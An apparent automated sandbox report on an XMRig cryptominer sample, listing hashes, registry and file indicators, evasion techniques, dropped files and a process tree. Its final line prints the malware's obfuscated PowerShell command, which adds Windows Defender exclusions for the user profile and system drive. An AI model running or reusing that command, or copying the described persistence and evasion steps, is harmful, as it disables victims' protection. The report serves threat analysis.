xmrig | d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f

Analysis

max time kernel
301s
max time network
275s
platform
windows7_x64
resource
win7-20220414-en
submitted
14-07-2022 22:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe
Size

7.5MB
MD5

dd9d0dfb0b3d274e3a418084142afcc6
SHA1

ffacc4206b3b84a6d2c105390cf1815e022e02a5
SHA256

d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f
SHA512

d21d35069ddedc02680f8a93f37f4ddb586b0f528bebbe13f1f917de1f9c9e87c79ba29169cd30a65f227c00db52de941d64b43b0727b9809f7f4885a58aa516

Score

10^/10

xmrig discovery evasion exploit miner themida trojan

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

setup.exeupdater.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup.exe
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe

XMRig Miner payload 13 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/1876-167-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1876-169-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1876-171-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1876-172-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1876-173-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1876-175-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1876-177-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1876-178-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1876-179-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1876-181-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1876-183-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1876-184-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig
behavioral1/memory/1876-186-0x0000000140000000-0x0000000140809000-memory.dmp	xmrig

Drops file in Drivers directory 2 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Executes dropped EXE 2 IoCs

Processes:

setup.exeupdater.exe

pid process

1920 setup.exe
544 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1336 takeown.exe
624 icacls.exe
676 takeown.exe
1528 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1920	setup.exe
544	updater.exe

pid	process
1336	takeown.exe
624	icacls.exe
676	takeown.exe
1528	icacls.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

setup.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe

Drops startup file 2 IoCs

Processes:

cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lol.bat	cmd.exe

Loads dropped DLL 2 IoCs

Processes:

d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exetaskeng.exe

pid process

1488 d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe
1812 taskeng.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1336 takeown.exe
624 icacls.exe
676 takeown.exe
1528 icacls.exe

pid	process
1488	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe
1812	taskeng.exe

pid	process
1336	takeown.exe
624	icacls.exe
676	takeown.exe
1528	icacls.exe

Themida packer 12 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
\Windows\Temp\setup.exe	themida
C:\Windows\Temp\setup.exe	themida
behavioral1/memory/1920-60-0x0000000000400000-0x00000000010BF000-memory.dmp	themida
behavioral1/memory/1920-61-0x0000000000400000-0x00000000010BF000-memory.dmp	themida
behavioral1/memory/1920-67-0x0000000000400000-0x00000000010BF000-memory.dmp	themida
C:\Windows\Temp\setup.exe	themida
\Program Files\Google\Chrome\updater.exe	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral1/memory/544-116-0x0000000000400000-0x00000000010BF000-memory.dmp	themida
behavioral1/memory/544-117-0x0000000000400000-0x00000000010BF000-memory.dmp	themida
behavioral1/memory/544-119-0x0000000000400000-0x00000000010BF000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

setup.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

setup.exeupdater.exe

pid process

1920 setup.exe
544 updater.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 908 set thread context of 1876 908 conhost.exe explorer.exe

pid	process
1920	setup.exe
544	updater.exe

description	pid	process	target process
PID 908 set thread context of 1876	908	conhost.exe	explorer.exe

Drops file in Program Files directory 3 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	conhost.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	conhost.exe
File created	C:\Program Files\Google\Libs\WR64.sys	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1148 sc.exe
1528 sc.exe
1496 sc.exe
764 sc.exe
1960 sc.exe
2000 sc.exe
2004 sc.exe
288 sc.exe
1980 sc.exe
1912 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

940 schtasks.exe

pid	process
1148	sc.exe
1528	sc.exe
1496	sc.exe
764	sc.exe
1960	sc.exe
2000	sc.exe
2004	sc.exe
288	sc.exe
1980	sc.exe
1912	sc.exe

pid	process
940	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 46 IoCs

adware spyware

Modify Registry

T1112

Processes:

IEXPLORE.EXEiexplore.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\ = "16"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\Total = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "364601940"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\Total = "16"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DOMStorage\take-realprize.life\ = "0"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70908470cf97d801	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006ed91f97cd930e48b5bc88543aa25c46000000000200000000001066000000010000200000009d75007ccfadb11bdd00c2e65b29e9ce656e566ea80dbf9e4c2d5264ede0c766000000000e8000000002000020000000aebaa27280bf011e95c97509350e9278d9cfda1f902260acdd67ff4735b6fbba90000000bfe21947c5be7da5035f830ab704482fe7d2b15e9f9a767056a1b25450de0d9cacb90f6f1d98712c26cd3ace45e92ad64b78254c8976f9feff06cdd980f4453cb887f6b2844ac8c68d349babf3b1d54ae858056a4f01992e270c7eaba02953e953410ba03856c7c9e5264fa529062a5d1b5c81b192eda4079e7fd5373095267c2bb9869d5d36d5f3443dd2e36ba78ca240000000f6bed99ca689e709da53625fecf3386b83ccf488311af66856f5c87e3efe9672c244cb520e986e78c4b956447bd8e1ca165a4fdc4a683d3501785d03c49a324d	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000006ed91f97cd930e48b5bc88543aa25c4600000000020000000000106600000001000020000000f6d975a3a63d8c6815fd2f23fc01fb76db2e50dcb240c1bb397d89079ec5fa8c000000000e8000000002000020000000e26c7dd1194ae8d62cc00705b892d564bdbdd204d3e385506128be5664779ed5200000004e9822eb7504085864b08e5edd05d7d0f461897e2485e1d1dabc354b213c219b400000005b7e60c40e105085d79600cf01b7605241446128ec8d497171eaa34d93d010397bdf8d458721b9ab4806414673a84ac7fe9aa8330e85361caff5f50c647a064b	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "16"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{8BD8A051-03C2-11ED-AB75-7E3B55B31640} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

conhost.exepowershell.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 302c6a57cf97d801	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	conhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	conhost.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1708	reg.exe
956	reg.exe
936	reg.exe
1036	reg.exe
1408	reg.exe
1496	reg.exe
2004	reg.exe
1588	reg.exe
1724	reg.exe
640	reg.exe
324	reg.exe
2028	reg.exe
1144	reg.exe
1716	reg.exe
1952	reg.exe
916	reg.exe
1716	reg.exe
980	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exeexplorer.exe

pid	process
1068	powershell.exe
1800	conhost.exe
1708	powershell.exe
908	conhost.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe
1876	explorer.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

460

pid	process
460

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.execonhost.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.execonhost.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	1068	powershell.exe
Token: SeShutdownPrivilege	1732	powercfg.exe
Token: SeShutdownPrivilege	1612	powercfg.exe
Token: SeShutdownPrivilege	1724	powercfg.exe
Token: SeShutdownPrivilege	1036	powercfg.exe
Token: SeTakeOwnershipPrivilege	1336	takeown.exe
Token: SeDebugPrivilege	1800	conhost.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeShutdownPrivilege	1612	powercfg.exe
Token: SeShutdownPrivilege	1408	powercfg.exe
Token: SeShutdownPrivilege	1040	powercfg.exe
Token: SeShutdownPrivilege	272	powercfg.exe
Token: SeTakeOwnershipPrivilege	676	takeown.exe
Token: SeDebugPrivilege	908	conhost.exe
Token: SeLockMemoryPrivilege	1876	explorer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

iexplore.exe

pid process

1124 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

1124 iexplore.exe
1124 iexplore.exe
1392 IEXPLORE.EXE
1392 IEXPLORE.EXE
1392 IEXPLORE.EXE
1392 IEXPLORE.EXE

pid	process
1124	iexplore.exe

pid	process
1124	iexplore.exe
1124	iexplore.exe
1392	IEXPLORE.EXE
1392	IEXPLORE.EXE
1392	IEXPLORE.EXE
1392	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exesetup.execmd.execonhost.exeiexplore.execmd.execmd.exe

description	pid	process	target process
PID 1488 wrote to memory of 1920	1488	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	setup.exe
PID 1488 wrote to memory of 1920	1488	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	setup.exe
PID 1488 wrote to memory of 1920	1488	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	setup.exe
PID 1488 wrote to memory of 1920	1488	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	setup.exe
PID 1488 wrote to memory of 1724	1488	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1488 wrote to memory of 1724	1488	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1488 wrote to memory of 1724	1488	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1488 wrote to memory of 1724	1488	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1488 wrote to memory of 1336	1488	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1488 wrote to memory of 1336	1488	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1488 wrote to memory of 1336	1488	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1488 wrote to memory of 1336	1488	d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe	cmd.exe
PID 1920 wrote to memory of 1800	1920	setup.exe	conhost.exe
PID 1920 wrote to memory of 1800	1920	setup.exe	conhost.exe
PID 1920 wrote to memory of 1800	1920	setup.exe	conhost.exe
PID 1920 wrote to memory of 1800	1920	setup.exe	conhost.exe
PID 1336 wrote to memory of 1124	1336	cmd.exe	iexplore.exe
PID 1336 wrote to memory of 1124	1336	cmd.exe	iexplore.exe
PID 1336 wrote to memory of 1124	1336	cmd.exe	iexplore.exe
PID 1336 wrote to memory of 1124	1336	cmd.exe	iexplore.exe
PID 1800 wrote to memory of 1068	1800	conhost.exe	powershell.exe
PID 1800 wrote to memory of 1068	1800	conhost.exe	powershell.exe
PID 1800 wrote to memory of 1068	1800	conhost.exe	powershell.exe
PID 1124 wrote to memory of 1392	1124	iexplore.exe	IEXPLORE.EXE
PID 1124 wrote to memory of 1392	1124	iexplore.exe	IEXPLORE.EXE
PID 1124 wrote to memory of 1392	1124	iexplore.exe	IEXPLORE.EXE
PID 1124 wrote to memory of 1392	1124	iexplore.exe	IEXPLORE.EXE
PID 1800 wrote to memory of 892	1800	conhost.exe	cmd.exe
PID 1800 wrote to memory of 892	1800	conhost.exe	cmd.exe
PID 1800 wrote to memory of 892	1800	conhost.exe	cmd.exe
PID 1800 wrote to memory of 1908	1800	conhost.exe	cmd.exe
PID 1800 wrote to memory of 1908	1800	conhost.exe	cmd.exe
PID 1800 wrote to memory of 1908	1800	conhost.exe	cmd.exe
PID 892 wrote to memory of 1960	892	cmd.exe	sc.exe
PID 892 wrote to memory of 1960	892	cmd.exe	sc.exe
PID 892 wrote to memory of 1960	892	cmd.exe	sc.exe
PID 892 wrote to memory of 2000	892	cmd.exe	sc.exe
PID 892 wrote to memory of 2000	892	cmd.exe	sc.exe
PID 892 wrote to memory of 2000	892	cmd.exe	sc.exe
PID 1908 wrote to memory of 1732	1908	cmd.exe	powercfg.exe
PID 1908 wrote to memory of 1732	1908	cmd.exe	powercfg.exe
PID 1908 wrote to memory of 1732	1908	cmd.exe	powercfg.exe
PID 892 wrote to memory of 2004	892	cmd.exe	sc.exe
PID 892 wrote to memory of 2004	892	cmd.exe	sc.exe
PID 892 wrote to memory of 2004	892	cmd.exe	sc.exe
PID 892 wrote to memory of 1148	892	cmd.exe	sc.exe
PID 892 wrote to memory of 1148	892	cmd.exe	sc.exe
PID 892 wrote to memory of 1148	892	cmd.exe	sc.exe
PID 892 wrote to memory of 288	892	cmd.exe	sc.exe
PID 892 wrote to memory of 288	892	cmd.exe	sc.exe
PID 892 wrote to memory of 288	892	cmd.exe	sc.exe
PID 892 wrote to memory of 1716	892	cmd.exe	reg.exe
PID 892 wrote to memory of 1716	892	cmd.exe	reg.exe
PID 892 wrote to memory of 1716	892	cmd.exe	reg.exe
PID 1908 wrote to memory of 1612	1908	cmd.exe	powercfg.exe
PID 1908 wrote to memory of 1612	1908	cmd.exe	powercfg.exe
PID 1908 wrote to memory of 1612	1908	cmd.exe	powercfg.exe
PID 892 wrote to memory of 1496	892	cmd.exe	reg.exe
PID 892 wrote to memory of 1496	892	cmd.exe	reg.exe
PID 892 wrote to memory of 1496	892	cmd.exe	reg.exe
PID 1908 wrote to memory of 1724	1908	cmd.exe	powercfg.exe
PID 1908 wrote to memory of 1724	1908	cmd.exe	powercfg.exe
PID 1908 wrote to memory of 1724	1908	cmd.exe	powercfg.exe
PID 892 wrote to memory of 640	892	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe
"C:\Users\Admin\AppData\Local\Temp\d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1488

C:\Windows\Temp\setup.exe
"C:\Windows\Temp\setup.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1920

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
3⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwB4AGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBvAGgAdwAjAD4A"
